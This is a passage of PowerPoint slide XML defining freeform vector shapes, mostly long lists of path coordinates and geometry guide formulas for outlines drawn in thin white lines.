                      <a:pt x="67" y="338"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="342"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="343"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="322"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="314"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="303"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="292"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="291"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="290"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="286"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="275"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="274"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="280"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="287"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="292"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="293"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="287"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="287"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="286"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="282"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="269"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="266"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="266"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="259"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="254"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="206" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="208" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="218" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="255" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="259" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="271" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="290" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="309" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="319" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="350" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="359" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="364" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="379" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="395" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="403" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="421" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="429" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="432" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="432" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="432" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="432" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="433" y="281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="433" y="317"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="433" y="385"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="433" y="417"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="433" y="432"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="435" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="437"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="458" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="463" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="466" y="442"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="447"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="469" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="485" y="470"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="492" y="479"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="493" y="475"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="472"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="508" y="463"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="514" y="456"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="517" y="454"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="523" y="455"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="458"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="528" y="465"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="469"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="545" y="485"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="493"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="563" y="517"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="575" y="542"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="579" y="547"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="580" y="547"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="587" y="551"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="602" y="561"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="605" y="564"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="603" y="574"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="606" y="584"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36197" name="Freeform 330"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="251" y="2602"/>
                <a:ext cx="11" cy="8"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 5 w 11"/>
                  <a:gd name="T1" fmla="*/ 8 h 8"/>
                  <a:gd name="T2" fmla="*/ 4 w 11"/>
                  <a:gd name="T3" fmla="*/ 7 h 8"/>
                  <a:gd name="T4" fmla="*/ 3 w 11"/>
                  <a:gd name="T5" fmla="*/ 5 h 8"/>
                  <a:gd name="T6" fmla="*/ 0 w 11"/>
                  <a:gd name="T7" fmla="*/ 2 h 8"/>
                  <a:gd name="T8" fmla="*/ 1 w 11"/>
                  <a:gd name="T9" fmla="*/ 1 h 8"/>
                  <a:gd name="T10" fmla="*/ 2 w 11"/>
                  <a:gd name="T11" fmla="*/ 0 h 8"/>
                  <a:gd name="T12" fmla="*/ 4 w 11"/>
                  <a:gd name="T13" fmla="*/ 2 h 8"/>
                  <a:gd name="T14" fmla="*/ 7 w 11"/>
                  <a:gd name="T15" fmla="*/ 2 h 8"/>
                  <a:gd name="T16" fmla="*/ 11 w 11"/>
                  <a:gd name="T17" fmla="*/ 5 h 8"/>
                  <a:gd name="T18" fmla="*/ 11 w 11"/>
                  <a:gd name="T19" fmla="*/ 6 h 8"/>
                  <a:gd name="T20" fmla="*/ 9 w 11"/>
                  <a:gd name="T21" fmla="*/ 8 h 8"/>
                  <a:gd name="T22" fmla="*/ 5 w 11"/>
                  <a:gd name="T23" fmla="*/ 8 h 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1"/>
                  <a:gd name="T37" fmla="*/ 0 h 8"/>
                  <a:gd name="T38" fmla="*/ 11 w 11"/>
                  <a:gd name="T39" fmla="*/ 8 h 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1" h="8">
                    <a:moveTo>
                      <a:pt x="5" y="8"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="4" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="8"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36198" name="Freeform 331"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="224" y="2592"/>
                <a:ext cx="10" cy="7"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 10 w 10"/>
                  <a:gd name="T1" fmla="*/ 6 h 7"/>
                  <a:gd name="T2" fmla="*/ 10 w 10"/>
                  <a:gd name="T3" fmla="*/ 7 h 7"/>
                  <a:gd name="T4" fmla="*/ 8 w 10"/>
                  <a:gd name="T5" fmla="*/ 7 h 7"/>
                  <a:gd name="T6" fmla="*/ 7 w 10"/>
                  <a:gd name="T7" fmla="*/ 6 h 7"/>
                  <a:gd name="T8" fmla="*/ 5 w 10"/>
                  <a:gd name="T9" fmla="*/ 6 h 7"/>
                  <a:gd name="T10" fmla="*/ 3 w 10"/>
                  <a:gd name="T11" fmla="*/ 7 h 7"/>
                  <a:gd name="T12" fmla="*/ 1 w 10"/>
                  <a:gd name="T13" fmla="*/ 4 h 7"/>
                  <a:gd name="T14" fmla="*/ 0 w 10"/>
                  <a:gd name="T15" fmla="*/ 2 h 7"/>
                  <a:gd name="T16" fmla="*/ 3 w 10"/>
                  <a:gd name="T17" fmla="*/ 2 h 7"/>
                  <a:gd name="T18" fmla="*/ 5 w 10"/>
                  <a:gd name="T19" fmla="*/ 0 h 7"/>
                  <a:gd name="T20" fmla="*/ 6 w 10"/>
                  <a:gd name="T21" fmla="*/ 1 h 7"/>
                  <a:gd name="T22" fmla="*/ 7 w 10"/>
                  <a:gd name="T23" fmla="*/ 4 h 7"/>
                  <a:gd name="T24" fmla="*/ 9 w 10"/>
                  <a:gd name="T25" fmla="*/ 4 h 7"/>
                  <a:gd name="T26" fmla="*/ 10 w 10"/>
                  <a:gd name="T27" fmla="*/ 6 h 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0"/>
                  <a:gd name="T43" fmla="*/ 0 h 7"/>
                  <a:gd name="T44" fmla="*/ 10 w 10"/>
                  <a:gd name="T45" fmla="*/ 7 h 7"/>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0" h="7">
                    <a:moveTo>
                      <a:pt x="10" y="6"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="10" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="6"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36199" name="Freeform 332"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="760" y="2039"/>
                <a:ext cx="917" cy="496"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 101 w 917"/>
                  <a:gd name="T1" fmla="*/ 335 h 496"/>
                  <a:gd name="T2" fmla="*/ 72 w 917"/>
                  <a:gd name="T3" fmla="*/ 321 h 496"/>
                  <a:gd name="T4" fmla="*/ 58 w 917"/>
                  <a:gd name="T5" fmla="*/ 301 h 496"/>
                  <a:gd name="T6" fmla="*/ 41 w 917"/>
                  <a:gd name="T7" fmla="*/ 273 h 496"/>
                  <a:gd name="T8" fmla="*/ 40 w 917"/>
                  <a:gd name="T9" fmla="*/ 262 h 496"/>
                  <a:gd name="T10" fmla="*/ 27 w 917"/>
                  <a:gd name="T11" fmla="*/ 247 h 496"/>
                  <a:gd name="T12" fmla="*/ 9 w 917"/>
                  <a:gd name="T13" fmla="*/ 187 h 496"/>
                  <a:gd name="T14" fmla="*/ 12 w 917"/>
                  <a:gd name="T15" fmla="*/ 89 h 496"/>
                  <a:gd name="T16" fmla="*/ 9 w 917"/>
                  <a:gd name="T17" fmla="*/ 74 h 496"/>
                  <a:gd name="T18" fmla="*/ 1 w 917"/>
                  <a:gd name="T19" fmla="*/ 27 h 496"/>
                  <a:gd name="T20" fmla="*/ 32 w 917"/>
                  <a:gd name="T21" fmla="*/ 51 h 496"/>
                  <a:gd name="T22" fmla="*/ 140 w 917"/>
                  <a:gd name="T23" fmla="*/ 10 h 496"/>
                  <a:gd name="T24" fmla="*/ 406 w 917"/>
                  <a:gd name="T25" fmla="*/ 11 h 496"/>
                  <a:gd name="T26" fmla="*/ 506 w 917"/>
                  <a:gd name="T27" fmla="*/ 23 h 496"/>
                  <a:gd name="T28" fmla="*/ 536 w 917"/>
                  <a:gd name="T29" fmla="*/ 33 h 496"/>
                  <a:gd name="T30" fmla="*/ 631 w 917"/>
                  <a:gd name="T31" fmla="*/ 67 h 496"/>
                  <a:gd name="T32" fmla="*/ 671 w 917"/>
                  <a:gd name="T33" fmla="*/ 153 h 496"/>
                  <a:gd name="T34" fmla="*/ 708 w 917"/>
                  <a:gd name="T35" fmla="*/ 161 h 496"/>
                  <a:gd name="T36" fmla="*/ 765 w 917"/>
                  <a:gd name="T37" fmla="*/ 123 h 496"/>
                  <a:gd name="T38" fmla="*/ 875 w 917"/>
                  <a:gd name="T39" fmla="*/ 60 h 496"/>
                  <a:gd name="T40" fmla="*/ 913 w 917"/>
                  <a:gd name="T41" fmla="*/ 94 h 496"/>
                  <a:gd name="T42" fmla="*/ 906 w 917"/>
                  <a:gd name="T43" fmla="*/ 114 h 496"/>
                  <a:gd name="T44" fmla="*/ 885 w 917"/>
                  <a:gd name="T45" fmla="*/ 118 h 496"/>
                  <a:gd name="T46" fmla="*/ 864 w 917"/>
                  <a:gd name="T47" fmla="*/ 135 h 496"/>
                  <a:gd name="T48" fmla="*/ 852 w 917"/>
                  <a:gd name="T49" fmla="*/ 163 h 496"/>
                  <a:gd name="T50" fmla="*/ 869 w 917"/>
                  <a:gd name="T51" fmla="*/ 172 h 496"/>
                  <a:gd name="T52" fmla="*/ 848 w 917"/>
                  <a:gd name="T53" fmla="*/ 175 h 496"/>
                  <a:gd name="T54" fmla="*/ 806 w 917"/>
                  <a:gd name="T55" fmla="*/ 188 h 496"/>
                  <a:gd name="T56" fmla="*/ 790 w 917"/>
                  <a:gd name="T57" fmla="*/ 233 h 496"/>
                  <a:gd name="T58" fmla="*/ 785 w 917"/>
                  <a:gd name="T59" fmla="*/ 235 h 496"/>
                  <a:gd name="T60" fmla="*/ 773 w 917"/>
                  <a:gd name="T61" fmla="*/ 267 h 496"/>
                  <a:gd name="T62" fmla="*/ 771 w 917"/>
                  <a:gd name="T63" fmla="*/ 245 h 496"/>
                  <a:gd name="T64" fmla="*/ 768 w 917"/>
                  <a:gd name="T65" fmla="*/ 233 h 496"/>
                  <a:gd name="T66" fmla="*/ 770 w 917"/>
                  <a:gd name="T67" fmla="*/ 224 h 496"/>
                  <a:gd name="T68" fmla="*/ 763 w 917"/>
                  <a:gd name="T69" fmla="*/ 242 h 496"/>
                  <a:gd name="T70" fmla="*/ 756 w 917"/>
                  <a:gd name="T71" fmla="*/ 238 h 496"/>
                  <a:gd name="T72" fmla="*/ 769 w 917"/>
                  <a:gd name="T73" fmla="*/ 261 h 496"/>
                  <a:gd name="T74" fmla="*/ 767 w 917"/>
                  <a:gd name="T75" fmla="*/ 267 h 496"/>
                  <a:gd name="T76" fmla="*/ 775 w 917"/>
                  <a:gd name="T77" fmla="*/ 278 h 496"/>
                  <a:gd name="T78" fmla="*/ 776 w 917"/>
                  <a:gd name="T79" fmla="*/ 290 h 496"/>
                  <a:gd name="T80" fmla="*/ 762 w 917"/>
                  <a:gd name="T81" fmla="*/ 286 h 496"/>
                  <a:gd name="T82" fmla="*/ 775 w 917"/>
                  <a:gd name="T83" fmla="*/ 292 h 496"/>
                  <a:gd name="T84" fmla="*/ 763 w 917"/>
                  <a:gd name="T85" fmla="*/ 303 h 496"/>
                  <a:gd name="T86" fmla="*/ 761 w 917"/>
                  <a:gd name="T87" fmla="*/ 313 h 496"/>
                  <a:gd name="T88" fmla="*/ 735 w 917"/>
                  <a:gd name="T89" fmla="*/ 334 h 496"/>
                  <a:gd name="T90" fmla="*/ 686 w 917"/>
                  <a:gd name="T91" fmla="*/ 393 h 496"/>
                  <a:gd name="T92" fmla="*/ 705 w 917"/>
                  <a:gd name="T93" fmla="*/ 489 h 496"/>
                  <a:gd name="T94" fmla="*/ 681 w 917"/>
                  <a:gd name="T95" fmla="*/ 477 h 496"/>
                  <a:gd name="T96" fmla="*/ 667 w 917"/>
                  <a:gd name="T97" fmla="*/ 435 h 496"/>
                  <a:gd name="T98" fmla="*/ 621 w 917"/>
                  <a:gd name="T99" fmla="*/ 403 h 496"/>
                  <a:gd name="T100" fmla="*/ 573 w 917"/>
                  <a:gd name="T101" fmla="*/ 399 h 496"/>
                  <a:gd name="T102" fmla="*/ 556 w 917"/>
                  <a:gd name="T103" fmla="*/ 412 h 496"/>
                  <a:gd name="T104" fmla="*/ 548 w 917"/>
                  <a:gd name="T105" fmla="*/ 419 h 496"/>
                  <a:gd name="T106" fmla="*/ 503 w 917"/>
                  <a:gd name="T107" fmla="*/ 412 h 496"/>
                  <a:gd name="T108" fmla="*/ 450 w 917"/>
                  <a:gd name="T109" fmla="*/ 430 h 496"/>
                  <a:gd name="T110" fmla="*/ 431 w 917"/>
                  <a:gd name="T111" fmla="*/ 468 h 496"/>
                  <a:gd name="T112" fmla="*/ 397 w 917"/>
                  <a:gd name="T113" fmla="*/ 450 h 496"/>
                  <a:gd name="T114" fmla="*/ 342 w 917"/>
                  <a:gd name="T115" fmla="*/ 424 h 496"/>
                  <a:gd name="T116" fmla="*/ 275 w 917"/>
                  <a:gd name="T117" fmla="*/ 374 h 496"/>
                  <a:gd name="T118" fmla="*/ 139 w 917"/>
                  <a:gd name="T119" fmla="*/ 358 h 49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917"/>
                  <a:gd name="T181" fmla="*/ 0 h 496"/>
                  <a:gd name="T182" fmla="*/ 917 w 917"/>
                  <a:gd name="T183" fmla="*/ 496 h 49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917" h="496">
                    <a:moveTo>
                      <a:pt x="120" y="359"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="119" y="359"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="356"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="355"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="355"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="356"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="355"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="349"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="344"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="340"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="337"/>
